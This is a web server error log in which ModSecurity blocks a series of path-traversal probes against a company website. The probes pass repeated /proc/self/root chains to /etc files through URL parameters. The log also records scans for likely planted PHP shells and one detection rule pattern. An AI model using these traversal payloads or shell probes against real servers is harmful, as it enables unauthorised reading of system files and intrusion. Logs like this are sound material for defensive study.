[Tue Mar 17 11:34:29.547492 2026] [:error] [pid 17965:tid 140411641214720] [client 74.7.243.203:57776] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmdat8Nd0UC_OcbVG7uwAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:32.295700 2026] [:error] [pid 18380:tid 140411557287680] [client 74.7.243.203:55122] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmeK4xEDsg_V3ESNY-9QAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:33.634611 2026] [:error] [pid 1016:tid 140411540502272] [client 74.7.243.203:55126] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmeZqmL8PQht4WJFlUEQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:35.995353 2026] [:error] [pid 2473:tid 140411607643904] [client 74.7.243.203:55140] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablme6BJNF7axNlVR0UITgAAABA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:37.368899 2026] [:error] [pid 11293:tid 140411716749056] [client 74.7.243.203:55154] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmfdCmCSWTlPouqorXyQAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:34:44.807951 2026] [access_compat:error] [pid 17965:tid 140411733534464] [client 203.175.125.130:32796] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/txets.php
[Tue Mar 17 11:34:45.981904 2026] [access_compat:error] [pid 2473:tid 140411548894976] [client 203.175.125.130:32802] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/txets.php
[Tue Mar 17 11:34:47.889928 2026] [access_compat:error] [pid 2473:tid 140411674785536] [client 203.175.125.130:32802] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/txets.php
[Tue Mar 17 11:34:48.282806 2026] [access_compat:error] [pid 2473:tid 140411725141760] [client 203.175.125.130:32802] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/txets.php
[Tue Mar 17 11:34:51.894735 2026] [access_compat:error] [pid 17965:tid 140411666392832] [client 203.175.125.130:60958] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/schallfuns.php
[Tue Mar 17 11:34:52.286281 2026] [access_compat:error] [pid 17965:tid 140411658000128] [client 203.175.125.130:60958] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/postnews.php
[Tue Mar 17 11:34:52.674704 2026] [access_compat:error] [pid 17965:tid 140411557287680] [client 203.175.125.130:60958] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-content/postnews.php
[Tue Mar 17 11:34:54.525065 2026] [:error] [pid 1016:tid 140411582465792] [client 74.7.241.46:40448] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmjpqmL8PQht4WJFlULAAAAVM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:35:00.679010 2026] [access_compat:error] [pid 7437:tid 140411574073088] [client 203.175.125.130:33034] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-admin/postnews.php
[Tue Mar 17 11:35:01.069264 2026] [access_compat:error] [pid 7437:tid 140411658000128] [client 203.175.125.130:33034] AH01797: client denied by server configuration: /home/storage/0/fc/16/bandeirantesbomb3/public_html/wp-includes/postnews.php
[Tue Mar 17 11:35:18.954457 2026] [:error] [pid 1016:tid 140411548894976] [client 74.7.244.31:40958] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablmppqmL8PQht4WJFlUNQAAAVc"]
[Tue Mar 17 11:35:28.443207 2026] [:error] [pid 9155:tid 140411565680384] [client 74.7.241.46:43652] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmsNbI7zhHXcabyMUyGgAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:35:56.839498 2026] [:error] [pid 2473:tid 140411683178240] [client 74.7.241.46:37048] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablmzKBJNF7axNlVR0UIiQAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:36:34.075496 2026] [:error] [pid 9299:tid 140411725141760] [client 74.7.228.16:38476] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ablm8r-sgTmmJoPuMdyqsAAAAsI"]
[Tue Mar 17 11:36:57.010950 2026] [:error] [pid 11293:tid 140411733534464] [client 74.7.243.203:42560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnCdCmCSWTlPouqorYOAAAAME"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:37:27.799453 2026] [:error] [pid 19507:tid 140411683178240] [client 74.7.241.46:43360] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/host.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnJ9Y0UrI5A3LftIzuwgAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:37:31.017064 2026] [:error] [pid 11293:tid 140411540502272] [client 74.7.243.203:52152] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnK9CmCSWTlPouqorYWQAAANg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:37:40.884908 2026] [:error] [pid 2473:tid 140411658000128] [client 74.7.241.46:40546] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/exports"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnNKBJNF7axNlVR0UIvgAAAAo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:37:58.408898 2026] [:error] [pid 9299:tid 140411540502272] [client 74.7.243.203:41488] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnRr-sgTmmJoPuMdyq6gAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:38:12.691480 2026] [:error] [pid 9155:tid 140411548894976] [client 74.7.243.203:35422] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnVNbI7zhHXcabyMUyTgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:38:15.082531 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.243.203:45996] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnV64xEDsg_V3ESNY_OQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 11:38:55.640299 2026] [:error] [pid 18709:tid 140411741927168] [client 74.7.241.46:56472] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rpc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnfzarLhPAjZGI1b26gAAAA4A"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Tue Mar 17 11:39:50.786124 2026] [:error] [pid 7437:tid 140411565680384] [client 74.7.243.203:38800] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablntgeiSKl8TjouI-YOOgAAA9U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Tue Mar 17 11:39:52.122099 2026] [:error] [pid 18380:tid 140411716749056] [client 74.7.243.203:50508] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnuK4xEDsg_V3ESNY_VwAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Tue Mar 17 11:40:15.355683 2026] [:error] [pid 9155:tid 140411699963648] [client 74.7.243.203:50520] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ablnz9bI7zhHXcabyMUyfgAAAkU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
